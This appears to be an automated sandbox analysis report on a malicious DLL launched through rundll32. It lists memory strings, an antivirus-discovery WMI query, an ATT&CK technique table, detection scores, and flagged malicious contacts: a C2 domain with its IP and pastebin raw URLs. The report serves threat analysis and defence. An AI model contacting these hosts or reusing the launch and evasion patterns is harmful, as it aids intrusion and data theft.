Source: rundll32.exe, 0000000D.00000002.3752310026.000000000627E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: t t`	memstr_00f43e10-7
Source: rundll32.exe, 0000000D.00000002.3752310026.000000000627E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \??\c:\windows\syswow64\wtsapi32.dll32.dll\??\c:\windows\system32\wtsapi32.dll	memstr_eff6b931-e
Source: rundll32.exe, 0000000D.00000002.3752310026.000000000627E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ggw##xx	memstr_ecb7100e-b
Source: rundll32.exe, 0000000D.00000002.3752310026.000000000627E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ppgwh	memstr_e13733cb-1
Source: rundll32.exe, 0000000D.00000002.3752310026.000000000627E000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: +s++h	memstr_03d539f4-a
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: feature not implemented	memstr_8dd60dad-9
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: object lock not owned	memstr_751c156c-f
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: interface not supported	memstr_4f0ebf5f-a
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: external exception %x	memstr_adbada81-f
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: privileged instruction	memstr_88dc91fc-f
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: invalid class typecast	memstr_46684ab2-e
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: floating point overflow	memstr_40cb4441-b
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: invalid numeric input	memstr_38935440-b
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: read beyond end of file	memstr_8bc7a28a-b
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: invalid time string: %s	memstr_a73431f4-4
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: invalid date string: %s	memstr_54762c43-e
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: resolving hostname %s.	memstr_d94890ad-6
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dwm notification window	memstr_b4771ab8-5
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: new tab - google chrome	memstr_7a8a72a6-1
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: new tab - google chrome!	memstr_4280eb36-8
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: new tab - google chromea	memstr_beab8f62-f
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: native.streamtoblockme	memstr_b06f54d8-9
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: native.streamtoblockme!	memstr_cf4b3d6f-7
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: azo06olt3gs7uifwf18b8	memstr_156daad5-d
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 50qgc5tvgwgctir3mczekrt304i8hneonhc+2qzfpz8=	memstr_dc9545ea-a
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ,50qgc5tvgwgctir3mczekrt304i8hneonhc+2qzfpz8=	memstr_2220e38c-9
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: https://setember2024inf2.is-a-nurse.com:50	memstr_958c75a8-4
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: *https://setember2024inf2.is-a-nurse.com:50k5!	memstr_7225ef01-4
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 5vanv4sdmc3veafr8s2m3m9u6wrh3p7fdd9t9q10iag5wzj5k5	memstr_d28e588c-6
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 25vanv4sdmc3veafr8s2m3m9u6wrh3p7fdd9t9q10iag5wzj5k5a	memstr_b7619fa4-6
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: c:\users\user\desktopk5	memstr_2878dc14-4
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: c:\users\user\desktop\!	memstr_b2bac179-8
Source: rundll32.exe, 0000000D.00000002.3751406101.0000000005DDC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: nd\bds	memstr_7b8215e9-6
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.compastebin.com	memstr_4b79776f-9
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mozilla/4.0 (compatible; win32; winhttp.winhttprequest.5)	memstr_23398732-b
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: keep-alive	memstr_34d0c07b-e
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /mozilla/4.0 (compatible; win32; winhttp.winhttprequest.5)keep-alive	memstr_92f7bd35-1
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: in; charset=utf-8	memstr_526fa3a6-5
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: in; charset=utf-8conl	memstr_f7c7145d-0
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpcx	memstr_a62aaf7b-8
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0_ollm	memstr_8425cb5f-e
Source: rundll32.exe, 0000000D.00000003.3514738682.0000000006985000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hresq	memstr_98923b09-9
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [tcp/ip]2\mswsock.dll,-60100	memstr_4f9948cb-9
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [udp/ip]2\mswsock.dll,-60101	memstr_de702699-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [raw/ip]2\mswsock.dll,-60102f	memstr_bd2195c0-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [tcp/ipv6]mswsock.dll,-60200	memstr_f32ecc3b-d
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [udp/ipv6]mswsock.dll,-60201	memstr_316dcec9-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [raw/ipv6]mswsock.dll,-60202&	memstr_9a7c989b-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: af_unixf	memstr_030d29ed-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp tcpv6 service providers.dll,-100f	memstr_f80ddfb0-1
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp tcp service providerqos.dll,-101&	memstr_80cb4d95-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp udpv6 service providers.dll,-102&	memstr_c18b3796-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp udp service providerqos.dll,-103&	memstr_8a39f911-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hyper-v raw	memstr_0c272d90-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd l2cap [bluetooth]&	memstr_cf50e865-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd rfcomm [bluetooth]o	memstr_74bd4312-9
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [tcp/ip]/	memstr_8f54d2bc-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dasyc	memstr_5f2e1b0e-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: uompasl(	memstr_8f26a87c-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: af_unixg	memstr_e518e199-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wbg`\|m	memstr_f25fab66-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j8x+dh;	memstr_a46e7160-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wi-]{	memstr_5d65779d-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tz}qe	memstr_b2266015-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #ko0~	memstr_b6364416-1
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.compastebin.com	memstr_133c4049-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp udpv6 service provider$	memstr_2d6de512-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp tcp service providerk	memstr_a5ac6be2-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [udp/ipv6]	memstr_e784e412-e
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd l2cap [bluetooth]	memstr_61c865b3-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd rfcomm [bluetooth](	memstr_76aaa779-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: simsun-extb	memstr_c3a2fd8a-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: simsun-extbo	memstr_78c22206-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp tcpv6 service provider	memstr_0346caf6-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rsvp udp service provider	memstr_085d6704-1
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.compastebin.com,	memstr_dbaee5b6-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msafd tcpip [raw/ipv6]/	memstr_8bbaad9e-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: accept	memstr_0bbe9719-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: accept/omh	memstr_b3cbdd8c-f
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ncalrpc	memstr_b1b767af-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: accept/	memstr_54e768d7-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: california1	memstr_b7ff0a61-0
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: san francisco1*0(	memstr_982e00a2-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !the universe security company ltd1*0(	memstr_48205877-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !the universe security company ltd0	memstr_596d600d-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 241002013438z	memstr_e21b59e6-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 251002013438z0	memstr_b774c345-9
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.com0	memstr_9d447da8-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &,6 /g	memstr_31037eed-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: m@^j^	memstr_8393cdac-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !the universe security company ltd	memstr_2997790c-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pastebin.com	memstr_a2b29e9a-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: *.pastebin.com0	memstr_9f18084d-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.2	memstr_2fbb9343-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.1.1	memstr_8f9bc88e-d
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.1.5	memstr_0072c8a0-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate manifold	memstr_fca08148-1
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape revocation url	memstr_cb469cf9-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unsigned cmc request	memstr_3fe39cae-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pkcs 7 signed enveloped	memstr_9fa4c3ab-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: subject key identifier	memstr_cbb29f30-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: esssecuritylabeldecodeex	memstr_faeffcc3-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: issuer alternative name	memstr_95d4465e-9
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key usage restriction	memstr_4ba78f84-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: esssigncertificatedecodeex	memstr_25a4a619-e
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate policies	memstr_17637605-f
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate extensions	memstr_a3b80770-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtual base crl number	memstr_a4e1ae8f-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate extensions6	memstr_b58a5bcf-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: private key archival?	memstr_8f290991-e
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: published crl locations	memstr_3291a50f-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.1.11	memstr_a4b82bdd-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.1.11)	memstr_3b631a0a-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spcfinancialcriteriar	memstr_639c01e5-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: encrypted private key[	memstr_47c47618-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: crl distribution points\	memstr_c30216d7-f
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape ssl servernamee	memstr_7d2821ce-b
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: windows product updaten	memstr_a33dfe66-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.4	memstr_f791f60c-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.4w	memstr_88daf740-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.3	memstr_56292c79-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.2.3x	memstr_1e57e876-d
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next update locationa	memstr_4b872615-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: unstructured addressj	memstr_1def0fc2-d
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape ca policy url	memstr_1b92544d-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: application policies	memstr_8a521595-0
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: supported algorithms	memstr_c16f4f63-f
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tpm security assertions	memstr_67bf7eb1-8
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: certificate trust list0	memstr_1e3e764f-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: root program flags	memstr_4172785a-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: domain component	memstr_8e0d4117-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: spcminimalcriteria	memstr_92207a77-0
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: client information	memstr_361d11d5-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: name constraints	memstr_e73b0e65-6
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jurisdiction hash	memstr_12a50543-e
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next crl publish	memstr_1c495ece-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: organisational unit	memstr_e8a42b0a-2
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cross ca version	memstr_36d13666-3
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape cert type	memstr_d6a42c4d-5
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: policy constraints	memstr_6a66cb39-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: delta crl indicator	memstr_4d4b70ef-d
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pkcs 7 enveloped	memstr_8e495262-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: key recovery agent	memstr_b7f4c426-f
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape base url	memstr_fedcb8c9-4
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: enterprise root oid	memstr_98530f71-a
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: inhibit any policy	memstr_905ad34c-c
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pkcs 7 encrypted	memstr_3b168acd-0
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: state or province	memstr_1c72d012-1
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netscape comment	memstr_04bcc8b3-7
Source: rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: quuu@	memstr_5da8e816-0

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5.dll",#1

Jump to behavior

Source: Amcache.hve.25.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: rundll32.exe, 0000000D.00000002.3752582020.00000000068F5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.25.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\SysWOW64\rundll32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 Credential API Hooking	341 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	121 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Rundll32	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	211 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
5.dll	34%	ReversingLabs
5.dll	36%	Virustotal		Browse
5.dll	100%	Avira	HEUR/AGEN.1327619

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://www.indyproject.org/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
setember2024inf2.is-a-nurse.com	208.109.246.134	true	true		unknown
pastebin.com	104.20.3.235	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/hQqNRrQt	true		unknown
https://pastebin.com/raw/ZELZp1Yr	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/ZELZp1YrHu	rundll32.exe, 0000000D.00000003.3722392095.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3752582020.000000000692E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3514890180.000000000692E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
